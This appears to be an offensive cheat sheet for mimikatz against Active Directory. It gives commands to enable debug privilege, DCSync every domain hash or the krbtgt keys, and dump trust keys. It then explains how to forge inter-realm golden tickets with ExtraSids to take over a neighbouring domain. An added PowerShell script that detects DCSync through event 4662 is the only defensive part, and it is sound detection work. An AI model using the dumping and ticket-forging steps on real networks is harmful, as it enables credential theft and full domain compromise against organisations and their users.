# mimikatz.exe
A little tool to play with Windows security.
# Get ready to work with mimikatz
Before running mimikatz, launch a command prompt with admin rights (you need to be a local admin for `privilege::debug` to succeed), then:
```
mimikatz.exe
privilege::debug
```
`privilege::debug` enables SeDebugPrivilege, which you need for anything that touches LSASS on the local box (the `sekurlsa::*` modules). The `lsadump::dcsync` commands below do not need it: they ask a DC to replicate secrets over DRSUAPI using the rights of the account you are running as (or impersonating), and nothing runs on the DC itself.
# Extract all hashes from a domain controller (when you have DA rights)
DA is the usual way in, but strictly what DCSync needs is a principal holding Replicating Directory Changes and Replicating Directory Changes All on the domain head (Domain Admins, Enterprise Admins and DC computer accounts have these by default; so do some sync accounts such as Entra Connect's). `/all` replicates every account and `/csv` prints one `rid,user,ntlm` line per account, which is the handy form for cracking or pass-the-hash:
```
lsadump::dcsync /domain:domain.com /all /csv
```
# Extract hashes of a single user
Drop `/all` and name the account with `/user:`. The krbtgt account is the usual target, since its keys are what you need to forge golden tickets:
```
lsadump::dcsync /domain:domain.com /user:krbtgt
```
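Both dcsync commands above (full dump and single user) look the same from the DC's side: a replication request, which on a DC with Directory Service Access auditing enabled and a SACL on the domain head is logged as Security event 4662 whose Properties list the replication control-access-right GUIDs. The following is an added example, not code from the original page or from mimikatz, that triages such events and flags replication by anything other than the accounts that legitimately replicate. The allow-list names (`DC01$`, `DC02$`, `MSOL_a1b2c3d4e5f6`) and the sample records are constructed assumptions for the example.

```powershell
# Added example (not from the original page): triage Security event 4662 for DCSync.
# DCSync is a DRSUAPI replication request, so it audits as 4662 with a Control Access
# (0x100) on the domain object and the replication rights below in Properties.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Flatten a live 4662 EventRecord (as returned by Get-WinEvent) into the shape Find-DcSync expects.
function ConvertFrom-4662 {
    param([Parameter(Mandatory)] $Record)
    $x = [xml]$Record.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        TimeCreated       = $Record.TimeCreated
        SubjectUserName   = $d['SubjectUserName']
        SubjectDomainName = $d['SubjectDomainName']
        ObjectName        = $d['ObjectName']
        AccessMask        = $d['AccessMask']
        # Properties is a multi-line string like "%%7688\n\t{guid}\n\t{guid}"; keep only the GUIDs.
        Properties        = @([regex]::Matches($d['Properties'], '[0-9a-fA-F-]{36}') |
                              ForEach-Object { $_.Value.ToLower() })
    }
}

function Find-DcSync {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        # Assumed allow-list for this example: DC computer accounts and an Entra Connect account.
        [string[]] $AllowList = @('DC01$', 'DC02$', 'MSOL_a1b2c3d4e5f6')
    )
    foreach ($e in $Events) {
        if ($e.AccessMask -ne '0x100') { continue }      # Control Access only
        $hits = @($e.Properties | Where-Object { $ReplRights.ContainsKey($_) })
        # Get-Changes-All (or the filtered-set right) is what yields secrets;
        # Get-Changes alone is noisy and cannot pull hashes.
        if ($hits -notcontains '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' -and
            $hits -notcontains '89e95b76-444d-4c62-991a-0facbeda640c') { continue }
        if ($AllowList -contains $e.SubjectUserName) { continue }
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Account     = "$($e.SubjectDomainName)\$($e.SubjectUserName)"
            Object      = $e.ObjectName
            Rights      = ($hits | ForEach-Object { $ReplRights[$_] }) -join ', '
        }
    }
}

# Constructed sample records (not real logs): a normal DC-to-DC replication, then a
# DCSync by a user account that should never replicate. Only the second is reported.
$Sample = @(
    [pscustomobject]@{
        TimeCreated = '2024-01-01 07:09:58'; SubjectUserName = 'DC02$'; SubjectDomainName = 'DOMAIN2'
        ObjectName = 'DC=domain2,DC=com'; AccessMask = '0x100'
        Properties = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')
    },
    [pscustomobject]@{
        TimeCreated = '2024-01-01 07:11:02'; SubjectUserName = 'jsmith'; SubjectDomainName = 'DOMAIN2'
        ObjectName = 'DC=domain2,DC=com'; AccessMask = '0x100'
        Properties = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',
                       '89e95b76-444d-4c62-991a-0facbeda640c')
    }
)
Find-DcSync -Events $Sample | Format-Table -AutoSize

# Against a real DC, last 24 hours:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662; StartTime=(Get-Date).AddDays(-1)} |
#     ForEach-Object { ConvertFrom-4662 $_ } | Find-DcSync
```

Run it on the DC itself or point `Get-WinEvent -ComputerName` at one; the point of keying on Get-Changes-All rather than on the account name is that a DCSync run as a freshly compromised DA still shows up, while the filtered-set right catches RODC-style replication of secrets as well.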
# Extract domain trust keys
For example, if you have pwn3d domain2.com and want the trust keys shared with domain1.com: the keys live on the trustedDomain object (TDO) for domain1.com under CN=System in domain2.com, so first look up that object's objectGUID, and then, from a mimikatz prompt in domain2.com where you have replication rights, replicate that one object (the `/guid:` value is the TDO's GUID, not domain1's domain GUID, and `/domain:` is the domain you are dumping from):
```
lsadump::dcsync /domain:domain2.com /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
```
The output will look something like:
```
<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
    * 1/1/2024 7:11 a.m. - CLEAR - <snip>
        aes256_hmac: BLAHBLAH
        aes128_hmac: BLAHBLAH
        rc4_hmac_nt: IMPORTANT!
<snip>
```
Take the rc4_hmac_nt value and use it with Rubeus (or mimikatz's `kerberos::golden`) to forge an inter-realm referral TGT for krbtgt/DOMAIN1.COM, then present that ticket to a DOMAIN1.COM DC to request service tickets there. How far that gets you depends on SID filtering: inside a forest (parent/child) you can stuff the DOMAIN1.COM Enterprise Admins SID into the ticket's ExtraSids and become a DOMAIN1 admin, whereas across an external or forest trust with SID filtering enabled those SIDs are stripped and you only get whatever access DOMAIN1.COM has explicitly granted your DOMAIN2.COM principal.
More good stuff about abusing domain trusts here, and I found this example to be excellent for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.
TIP
One time mimikatz threw an error (unfortunately I didn't write it down) about not being able to extract the krbtgt account, but after reading this article I learned I had to use the /domain flag to specify the domain I was dumping from.